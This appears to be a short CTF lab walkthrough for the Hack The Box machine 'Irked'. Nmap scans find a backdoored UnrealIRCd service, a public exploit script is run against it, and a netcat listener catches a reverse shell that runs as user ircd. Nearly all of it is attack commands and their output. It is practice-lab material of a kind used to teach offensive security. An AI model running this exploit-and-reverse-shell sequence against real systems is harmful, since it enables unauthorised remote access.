3 :6697 irc

$ nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,6660-7000 irked.htb
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-06 12:46 PDT
Nmap scan report for irked.htb (10.10.10.117)
Host is up (0.071s latency).
Not shown: 341 closed ports
PORT     STATE SERVICE VERSION
6697/tcp open  irc     UnrealIRCd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.16 seconds

$ nmap --script irc-unrealircd-backdoor.nse 10.10.10.117 -p 6697
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-06 12:49 PDT
Nmap scan report for irked.htb (10.10.10.117)
Host is up (0.073s latency).

PORT     STATE SERVICE
6697/tcp open  ircs-u
|_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277

Nmap done: 1 IP address (1 host up) scanned in 17.72 seconds

Using https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor

$ python3 exploit.py 10.10.10.117 6697 -payload python
Exploit sent successfully!

$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.14.31] from (UNKNOWN) [10.10.10.117] 59517
whoami;id
ircd
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)

Previous4 box enum Next2 :80

Last updated 4 years ago